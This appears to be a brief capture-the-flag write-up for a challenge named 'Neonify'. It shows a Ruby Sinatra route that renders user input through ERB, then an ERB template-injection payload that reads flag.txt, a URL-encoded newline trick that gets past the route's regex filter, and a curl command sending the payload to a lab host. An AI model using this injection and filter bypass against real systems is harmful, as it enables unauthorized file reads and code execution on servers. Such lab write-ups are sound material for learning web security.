Neonify
post '/' do
if params[:neon] =~ /^[0-9a-z ]+$/i
@neon = ERB.new(params[:neon]).result(binding)
else
@neon = "Malicious Input Detected"
end
erb :'index'
end
# Read file
<%= File.open('flag.txt').read %>
# URL encoded
%3C%25=%20File.open('flag.txt').read%20%25%3E%20#%20Read%20file%0A
# start a new line to bypass RegEx filter
neon=a
%3C%25=%20File.open('flag.txt').read%20%25%3E%20#%20Read%20file%0A
$ curl http://94.237.48.147:48313/ \
-s -X POST -d 'neon=a
%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E'